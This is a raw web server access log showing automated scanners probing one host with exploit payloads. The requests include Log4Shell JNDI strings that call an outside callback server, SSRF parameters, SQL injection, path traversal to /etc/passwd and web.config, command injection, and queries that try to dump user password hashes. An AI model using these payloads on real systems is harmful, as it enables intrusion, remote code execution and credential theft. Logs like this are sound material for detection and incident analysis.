120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 2646 "${jndi:rmi://120.48.76.100:8182/i/hcSvqI7U/3cd0f8/sc8v/i3yu/PQ5P8iBh/}" "${jndi:rmi://120.48.76.100:8182/i/hcSvqI7U/b52990/sc8v/ihxz/PQ5P8iBh/}"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /entsoft/CompInfoAction.emrser;.js?compnum=1%27%20UNION%20ALL%20SELECT%20NULL%2C42717*41246%2CNULL%2CNULL%2CNULL--%20fteP&method=selectCompBank HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1" 404 138 "http://106.12.86.167:443/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - guest [24/Nov/2025:00:50:00 +0800] "POST /backup2.cgi HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /Adminpage/Remote/cmdOver?remoteId=local&cmd=start%20cat%20/etc/passwd%26%26nginx HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1" 404 138 "http://106.12.86.167:443/HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST http://106.12.86.167:443/cooperate/videotexMonitor.js%70 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "new+javax.naming.InitialContext%28%29.lookup%28%22ldap://120.48.76.100:8181/i/LDAP-START/c564b7/ezez/1uxz/LDAP-END%22%29" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "POST / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "${:-y$}{${xm7:-j}nd${env:108:-}i:r${oxi::-m}i://120.48.76.100:8182/i/hcSvqI7U/311220/sc8v/4wgw/PQ5P8iBh/?Type=A Type&Name=1100110&Char=!}" "${:-y$}{${xm7:-j}nd${env:108:-}i:r${dfw::-m}i://120.48.76.100:8182/i/hcSvqI7U/97d96e/sc8v/md82/PQ5P8iBh/?Type=A Type&Name=1100110&Char=!}"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /AjaxMethods.asmx/GetSalQuatation HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-includes/css/buttons.min.css.map?ver=6.7.2 HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /module/Kernel/Controller/SysOrgInPermission.ashx?action=find&org_id=-1%0funion%0fselect%0fnull,null,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27vsszmkrd%27)),null-- HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /OpenPublicCourse.aspx?cid=NSBhbmQgMT1zeXMuZm5fc3FsdmFyYmFzZXRvc3RyKEhhc2hCeXRlcygnTUQ1JywnODE0NDYnKSktLQ== HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "new+javax.naming.InitialContext%28%29.lookup%28%22ldap://120.48.76.100:8181/i/LDAP-START/c564b7/ezez/1uxz/LDAP-END%22%29" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /api/project/get HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /admin/login_login.action HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /cgi-bin/tsaws.cgi HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /controlloLogin.js HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /Adminpage/Remote/cmdOver?remoteId=local&cmd=start%20type%20C://windows/win.ini%26%26nginx HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 2646 "${:-y$}{${xm7:-j}nd${env:108:-}i:r${oxi::-m}i://120.48.76.100:8182/i/hcSvqI7U/311220/sc8v/4wgw/PQ5P8iBh/?Type=A Type&Name=1100110&Char=!}" "${:-y$}{${xm7:-j}nd${env:108:-}i:r${dfw::-m}i://120.48.76.100:8182/i/hcSvqI7U/97d96e/sc8v/md82/PQ5P8iBh/?Type=A Type&Name=1100110&Char=!}"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST http://106.12.86.167:443/cooperate/videotexMonitor.js%70 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /sys/common/dataxml.jsp?service=sysTagTagsService HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /OpenPublicCourse.aspx?cid=NSBhbmQgMT1zeXMuZm5fc3FsdmFyYmFzZXRvc3RyKEhhc2hCeXRlcygnTUQ1JywnODE0NDYnKSktLQ== HTTP/1.1" 404 138 "http://106.12.86.167:443/OpenPublicCourse.aspx?cid=NSBhbmQgMT1zeXMuZm5fc3FsdmFyYmFzZXRvc3RyKEhhc2hCeXRlcygnTUQ1JywnODE0NDYnKSktLQ==" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET / HTTP/1.1" 302 5 "1.class.forName(\x22javax.naming.InitialContext\x22).newInstance().lookup(\x22ldap://120.48.76.100:8181/i/LDAP-START/8743fd/ezez/96v5/LDAP-END\x22)" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 404 138 "http://106.12.86.167:443/cgi-bin/sslvpnclient?launchplatform=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/css/forms.min.css.map?ver=6.7.2 HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /device/config HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "GET /jeecgboot/sys/dict/loadTreeData?tableName=sys_user&text=password,salt&code=password&condition=&pidField=username&pid=admin&hasChildField=1&converIsLeafVal=1 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "POST / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /ySnKu/$%7Bjndi:rmi:%2F%2F120.48.76.100:8182%2Fi%2FhcSvqI7U%2F4d846e%2Fx42a%2Flfxk%2FPQ5P8iBh%2F%7D HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /casmain.xgi HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /explore/projects HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "1.class.forName(\x22javax.naming.InitialContext\x22).newInstance().lookup(\x22ldap://120.48.76.100:8181/i/LDAP-START/8743fd/ezez/96v5/LDAP-END\x22)" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /defaultroot/modules/govoffice/gov_documentmanager/sendfile_gd.jsp;.js?recordId=1;WAITFOR+DELAY+'0:0:0'--&tableId=&processId= HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:00 +0800] "POST /Ajax/AjaxMethod.ashx HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /api/VersionManage/getDeviceInfoById?deviceId=9527%27%3BWAITFOR%20DELAY%20%270%3A0%3A0%27%20--%20%20%2B HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /PMYfG/$%7B:-y$%7D%7B$%7Bkir:-j%7Dnd$%7Benv:uzw:-%7Di:r$%7Bzg0::-m%7Di:%2F%2F120.48.76.100:8182%2Fi%2FhcSvqI7U%2Ff37ccb%2Fx42a%2Fu6nq%2FPQ5P8iBh%2F%3FType=A%20Type&Name=1100110&Char=%21%7D HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "GET /WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','159516')),3,32)%3E0-- HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:00 +0800] "POST /sys/;/common/dataxml.jsp?service=sysTagTagsService HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:00 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /explore/projects HTTP/1.1" 404 138 "http://106.12.86.167:443/explore/projects" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /api/v1/passport/auth/register HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET / HTTP/1.1" 302 5 "1.class.forName%28%22javax.naming.InitialContext%22%29.newInstance%28%29.lookup%28%22ldap://120.48.76.100:8181/i/LDAP-START/962d0f/ezez/xgwl/LDAP-END%22%29" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/css/l10n.min.css.map?ver=6.7.2 HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /emm-core/oauth/token HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /defaultroot/modules/govoffice/gov_documentmanager/sendfile_gd.jsp;.js?recordId=1;WAITFOR+DELAY+'0:0:0'--&tableId=&processId= HTTP/1.1" 404 138 "http://106.12.86.167:443/defaultroot/modules/govoffice/gov_documentmanager/sendfile_gd.jsp;.js?recordId=1;WAITFOR+DELAY+'0:0:0'--&tableId=&processId=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password,salt&code=password&condition=&pidField=username&pid=admin&hasChildField=1&converIsLeafVal=1 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET / HTTP/1.1" 302 5 "${jndi:rmi://120.48.76.100:8182/i/hcSvqI7U/64f80b/2vvf/5sha/PQ5P8iBh/}" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "POST / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /api/VersionManage/getDeviceInfoById?deviceId=9527%27%3BWAITFOR%20DELAY%20%270%3A0%3A0%27%20--%20%20%2B HTTP/1.1" 404 138 "http://106.12.86.167:443/api/VersionManage/getDeviceInfoById?deviceId=9527%27%3BWAITFOR%20DELAY%20%270%3A0%3A0%27%20--%20%20%2B" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /index.php/User/doLogin HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /defaultroot/platform/portal/portlet/rssproxy.jsp?rssUrl=http://120.48.76.100:8181/i/85a491/dgmh/2a3s/&charEncode=UTF-8 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /emm-core/oauth/token HTTP/1.1" 404 138 "http://106.12.86.167:443/emm-core/oauth/token" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','159516')),3,32)%3E0-- HTTP/1.1" 404 138 "http://106.12.86.167:443/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','159516')),3,32)%3E0--" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "1.class.forName%28%22javax.naming.InitialContext%22%29.newInstance%28%29.lookup%28%22ldap://120.48.76.100:8181/i/LDAP-START/962d0f/ezez/xgwl/LDAP-END%22%29" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "POST /sys/./common/dataxml.jsp?service=sysTagTagsService HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "POST /servlet/~ic/nc.document.pub.fileSystem.servlet.DeleteServlet HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "${jndi:rmi://120.48.76.100:8182/i/hcSvqI7U/64f80b/2vvf/5sha/PQ5P8iBh/}" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /C6/Control/GetDictionary.aspx/ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/css/install.min.css.map?ver=6.7.2 HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /defaultroot/platform/portal/portlet/rssproxy.jsp?rssUrl=http://120.48.76.100:8181/i/85a491/dgmh/2a3s/&charEncode=UTF-8 HTTP/1.1" 404 138 "http://106.12.86.167:443/defaultroot/platform/portal/portlet/rssproxy.jsp?rssUrl=http://120.48.76.100:8181/i/85a491/dgmh/2a3s/&charEncode=UTF-8" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /api/files/UploadFile HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password,salt&code=password&condition=&pidField=username&pid=admin&hasChildField=1&converIsLeafVal=1 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET / HTTP/1.1" 302 5 "new javax.naming.InitialContext().lookup(\x22ldap://120.48.76.100:8181/i/LDAP-START/448136/ezez/o452/LDAP-END\x22)" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "POST /fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET / HTTP/1.1" 302 5 "${:-y$}{${1n5:-j}nd${env:aws:-}i:r${cxy::-m}i://120.48.76.100:8182/i/hcSvqI7U/e5e75a/2vvf/3y8b/PQ5P8iBh/?Type=A Type&Name=1100110&Char=!}" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "POST / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /Mobile/Account/DingDingConfigNew HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "POST /CDGServer3/AutoSignService1?command=GETSYSTEMINFO HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET http://106.12.86.167:443/ProxyServletUti%6c?url=http://120.48.76.100:8181/i/7e7e8a/gvqa/g07p/ HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /appInfo/save HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo%201965649-144|bc%20%3Euupvq.txt|cat HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /jeecgboot/sys/api/queryTableDictItemsByCode?table=sys_user&text=(%27ed6409e5f0d3c8bcf788fc24b01f5995%27)%20as%20%27text%27%20from+sys_user--+&code=username HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "new javax.naming.InitialContext().lookup(\x22ldap://120.48.76.100:8181/i/LDAP-START/448136/ezez/o452/LDAP-END\x22)" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
